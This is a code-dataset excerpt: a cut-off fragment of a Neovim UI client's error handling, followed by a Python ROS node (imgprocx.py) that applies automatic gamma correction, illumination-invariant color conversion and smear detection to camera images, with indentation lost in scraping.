print('ERROR OCCURED, unfortunalety no traceback..')
import pdb;pdb.set_trace()
self._error = format_exc()
self._call(self._nvim.quit)
if method == 'redraw':
self._ui.schedule_screen_update(apply_updates)
self._nvim.run_loop(on_request, on_notification, on_setup)
self._ui.quit()
|
imgprocx.py
|
#!/usr/bin/python
from __future__ import division
import cv2
from cv2 import cv
from copy import copy
import numpy as np
import multiprocessing.dummy as mp
from multiprocessing import Lock
import sys
import math
import rospy
import roslib
import cv_bridge
from sensor_msgs.msg import Image
from numpy import dtype
class ImageProcessor():
# Processing Mode
# mode = 0 : Do nothing
# mode = 1 : Automatic gamma adjustment
# mode = 2 : Convertion to Illumination-invariant color space
def __init__ (self, processMode=0, subscribedImageTopic='', publishedImageTopic='', maskPath=None, **kwargs):
self.imageSub = rospy.Subscriber(subscribedImageTopic, Image, self.imageCallback, queue_size=100)
self.publisher = rospy.Publisher(publishedImageTopic, Image, queue_size=100)
self.bridge = cv_bridge.CvBridge()
self.mask = cv2.imread (maskPath, cv2.cv.CV_LOAD_IMAGE_GRAYSCALE)
self.cImage = None
self.resultImage = None
self.cImageHsv = None
self.isMono = None
self.imageMutex = Lock ()
self.mode = processMode
try:
self.doSmearDetection = bool(kwargs['smearDetection'])
self.iiAlpha = kwargs['IlluminatiAlpha']
except KeyError:
self.doSmearDetection = False
self.iiAlpha = 0.394
# cv2.namedWindow('xyz')
def imageCallback (self, imageMsg):
# print ("Callback called")
# self.imageMutex.acquire()
self.cImage = self.bridge.imgmsg_to_cv2(imageMsg, 'bgr8')
self.isMono = False
# self.imageMutex.release()
self.process()
if self.isMono:
msg = self.bridge.cv2_to_imgmsg(self.resultImage, 'mono8')
else:
msg = self.bridge.cv2_to_imgmsg(self.resultImage, 'bgr8')
msg.header.stamp = rospy.Time.now()
self.publisher.publish(msg)
def process (self):
if self.cImage is None :
return
# self.imageMutex.acquire ()
# Preparation
imghsv = cv2.cvtColor(self.cImage, cv.CV_BGR2HSV)
self.cImageHsv = cv2.split(imghsv)
if self.doSmearDetection:
smearQual = self.detectSmear(self.cImageHsv[2])
print ("Smear: {}".format(smearQual))
if self.mode == 0:
self.resultImage = self.cImage
self.isMono = False
elif self.mode == 1 :
self.resultImage = ImageProcessor.autoAdjustGammaRGB(self.cImage, self.mask)
self.isMono = False
elif self.mode == 2 :
self.resultImage = ImageProcessor.toIlluminatiInvariant(self.cImage, self.iiAlpha)
self.isMono = True
# self.imageMutex.release ()
@staticmethod
def autoAdjustGammaRGB (rgbImage, mask=None, gammaOnly=False):
monoimg = cv2.cvtColor(rgbImage, cv.CV_BGR2GRAY)
g = ImageProcessor.autoAdjustGammaMono(monoimg, mask, gammaOnly=True)
if gammaOnly:
return g
img_b = ImageProcessor.setGamma(rgbImage[:,:,0], g)
img_g = ImageProcessor.setGamma(rgbImage[:,:,1], g)
img_r = ImageProcessor.setGamma(rgbImage[:,:,2], g)
return cv2.merge([img_b, img_g, img_r])
@staticmethod
def autoAdjustGammaMono (grayImage, mask=None, gammaOnly=False):
roicdf = ImageProcessor.cdf(grayImage, mask)
# Try to find midtone; it is X when cdf[X] = 0.5
midtone = 0
for i in range(len(roicdf)):
if roicdf[i]>=0.5:
midtone = i
break
target = 0.5
midtone /= 255.0
gamma = math.log(target) / math.log(midtone)
if (gammaOnly):
return gamma
if (midtone >= 0.5):
return grayImage
return ImageProcessor.setGamma (grayImage, gamma)
@staticmethod
def toIlluminatiInvariant (imageRgb, alpha):
imgf = np.array(imageRgb, dtype=np.float32) / 255.0
imgf = 0.5 + np.log(imgf[:,:,1]) - alpha*np.log(imgf[:,:,0]) - (1-alpha)*np.log(imgf[:,:,2])
return np.array(imgf*255.0, dtype=np.uint8)
# return cv2.cvtColor(img, cv.CV_GRAY2BGR)
def beautify (self):
midall = self.allcdf[127]
midroi = self.roicdf[127]
def needBeautify ():
if (midall >= 0.4 and midall <= 0.6):
return False
if (midall > 0.6 and midroi < midall):
return False
if (midall > 0.6 and midroi-midall>=0.16):
return True
# if abs(midall-midroi) <
if (needBeautify()):
self.cImageHsv[2] = ImageProcessor.equalizeByMask(self.cImageHsv[2], self.mask)
self.noProcess = False
else:
return
@staticmethod
def getNormalizedVerticalSum (chan):
channorm = chan / 256.0
tv = np.zeros(channorm.shape[1], dtype=np.float32)
for i in range(channorm.shape[1]):
tv[i] = np.sum(channorm[:,i])
tv /= float(channorm.shape[0])
return tv
@staticmethod
def detectSmear (VchanSrc, tolerance=0.1):
threshold1 = 0.15 * VchanSrc.shape[1]
# Normalize V channel
tv = ImageProcessor.getNormalizedVerticalSum(VchanSrc)
nc = 0
for i in range(VchanSrc.shape[1]) :
if tv[i] >= 1.0-tolerance:
nc += 1
if nc==0:
return -1
else:
print ("Cols: {}".format(nc))
if nc >= threshold1:
return 1
else:
return float(nc) / float(threshold1)
@staticmethod
def setGamma (source, gamma):
LUT = np.array(
[ ((i/255.0)**gamma)*255.0 for i in range(256)]
, dtype=np.uint8)
return cv2.LUT(source, LUT)
@staticmethod
def equalizeByMask (source, mask=None):
LUT = np.zeros((256,1), dtype=np.uint8)
output = np.zeros(source.shape, dtype=source.dtype)
hist = cv2.calcHist ([source], [0], mask, [256], [0,256])
p = 0
while (hist[p]==0):
p += 1
total = source.shape[0]*source.shape[1]
miz = hist[p]
scale = 256.0 / (total-miz)
sum = 0
for i in range (p, 256):
sum += int (hist[i])
l = sum * scale
if l > 255:
LUT[i] = 255
else:
LUT[i] = l
cv2.LUT(source, LUT, output)
return output
# for (LUT.at<uchar>(i++)=0; i<256; ++i) {
# sum += (int)hist.at<float>(i);
# LUT.at<uchar>(i) = cv::saturate_cast<uchar>(sum * scale);
# }
# def needEqualize (self):
# pass
@staticmethod
def cdf (grayImage, mask=None, normalized=True):
hist = cv2.calcHist ([grayImage], [0], mask, [256], [0,256])
rcdf = np.cumsum(hist)
if normalized:
return rcdf / sum(hist)
else:
return rcdf
# class Downsampler:
# def __init__ (self, imgproc, publishedTopic, rate=10.0):
# self.rate = rospy.Rate(rate)
# self.imgproc = imgproc
# self.publisher = rospy.Publisher(publishedTopic, Image, queue_size=10)
# self.bridge = cv_bridge.CvBridge()
#
# self.stop = False
# self.process = mp.Process(target=self.start)
# self.process.start()
#
# def start (self):
# while self.stop==False:
#
# currentImage = None
# self.imgproc.process()
# currentImage = self.imgproc.resultImage
#
# if currentImage is not None:
# if self.imgproc.isMono:
# msg = self.bridge.cv2_to_imgmsg(currentImage, 'mono8')
# else:
# msg = self.bridge.cv2_to_imgmsg(currentImage, 'bgr8')
# msg.header.stamp = rospy.Time.now()
# self.publisher.publish(msg)
# self.rate.sleep()
if __name__ == '__main__' :
maskpath = sys.argv[1]
mode = 0
try:
mode = int (sys.argv[2])
except IndexError:
pass
if mode == 0:
print ("Images will be untouched")
else:
print ("Images will be modified")
rospy.init_node("imgprocx", anonymous=True)
imgproc = ImageProcessor (mode, "/camera/image_raw", "/camera/image_hs", maskpath, smearDetection=False, IlluminatiAlpha=0.3975)
# downsample = Downsampler (imgproc, "/camera/image_hs", rate=10.0)
rospy.spin()
# downsample.stop = True
pass
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.